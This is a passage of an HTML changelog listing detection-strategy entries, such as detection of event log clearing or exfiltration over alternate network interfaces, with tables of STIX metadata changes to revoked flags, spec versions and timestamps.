black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.697000+00:00</td></tr></tbody></table></details><hr><h4>[DET0426] Detection of Direct Volume Access for File System Evasion</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.697000+00:00</td></tr></tbody></table></details><hr><h4>[DET0145] Detection of Disabled or Modified System Firewalls across OS Platforms.</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.688000+00:00</td></tr></tbody></table></details><hr><h4>[DET0847] Detection of Domain Properties</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.690000+00:00</td></tr></tbody></table></details><hr><h4>[DET0007] Detection of Domain Trust Discovery via API, Script, and CLI Enumeration</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.674000+00:00</td></tr></tbody></table></details><hr><h4>[DET0270] Detection of Domain or Tenant Policy Modifications via AD and Identity Provider</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.675000+00:00</td></tr></tbody></table></details><hr><h4>[DET0892] Detection of Domains</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.674000+00:00</td></tr></tbody></table></details><hr><h4>[DET0863] Detection of Domains</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.695000+00:00</td></tr></tbody></table></details><hr><h4>[DET0825] Detection of Drive-by Target</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.675000+00:00</td></tr></tbody></table></details><hr><h4>[DET0835] Detection of Email Accounts</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.677000+00:00</td></tr></tbody></table></details><hr><h4>[DET0861] Detection of Email Accounts</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0814] Detection of Email Addresses</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.674000+00:00</td></tr></tbody></table></details><hr><h4>[DET0857] Detection of Employee Names</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.673000+00:00</td></tr></tbody></table></details><hr><h4>[DET0873] Detection of Establish Accounts</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.668000+00:00</td></tr></tbody></table></details><hr><h4>[DET0532] Detection of Event Log Clearing on Windows via Behavioral Chain</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0077] Detection of Exfiltration Over Alternate Network Interfaces</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.685000+00:00</td></tr></tbody></table></details><hr><h4>[DET0512] Detection of Exfiltration Over Asymmetric Encrypted Non-C2 Protocol</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid 